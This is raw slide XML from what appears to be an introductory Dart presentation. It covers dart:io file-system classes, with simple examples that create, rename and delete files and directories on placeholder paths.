            <a:ext cx="4001700" cy="4162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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File and Directory Listing:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Directory.list()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Retrieves a list of files and directories in a directory.</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GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>FileStat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Provides information about a file, including size and modification time.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File System Operations:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>FileSystemEntity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: An abstract class representing a file system entity (file or directory) with common properties and methods.</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GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>FileSystemEntity.type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Determines whether an entity is a file or directory.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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a0d279bb21_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426325" y="339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dart:io examples:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Google Shape;175;g2a0d279bb21_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864400" y="1017725"/>
            <a:ext cx="3951900" cy="40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350"/>
              <a:t>import 'dart:io';</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>void createEmptyFile(String filePath) async {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  var file = File(filePath);</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  // Create the file. This returns a Future&lt;File&gt;.</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  await file.create(recursive: true);</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  print('Empty file created at $filePath');</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>void main() {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  createEmptyFile('path/to/your/file.txt');</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="Google Shape;176;g2a0d279bb21_0_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77" name="Google Shape;177;g2a0d279bb21_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5652950" y="3869850"/>
            <a:ext cx="30000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800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File creation</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a0d279bb21_0_36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729175" y="133950"/>
            <a:ext cx="5088600" cy="40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350"/>
              <a:t>import 'dart:io';</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>void renameFile(String currentPath, String newPath) async {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  var file = File(currentPath);</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  if (await file.exists()) {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>	await file.rename(newPath);</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>	print('File renamed to $newPath');</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  } else {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>	print('File not found: $currentPath');</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  }</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>void main() {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  renameFile('path/to/your/oldfile.txt', 'path/to/your/newfile.txt');</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Google Shape;183;g2a0d279bb21_0_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184" name="Google Shape;184;g2a0d279bb21_0_36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5691900" y="3932475"/>
            <a:ext cx="30000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800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File rename</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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857249" y="654703"/>
            <a:ext cx="4459718" cy="1020674"/>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GB"/>
              <a:t>What is Dart?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Google Shape;58;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="1749025"/>
            <a:ext cx="5180700" cy="2880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GB"/>
              <a:t>Modern, scalable, general purpose programming language</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Developed by Google in 2011</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Designed for building fast apps on multiple platforms</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="Google Shape;59;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391733" y="2869925"/>
            <a:ext cx="2599867" cy="1359650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="Google Shape;60;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4527071" y="2347325"/>
            <a:ext cx="443525" cy="448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a0d279bb21_0_54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764475" y="81150"/>
            <a:ext cx="8096100" cy="49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350"/>
              <a:t>import 'dart:io';</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>void deleteDirectory(String path) async {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  var dir = Directory(path);</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
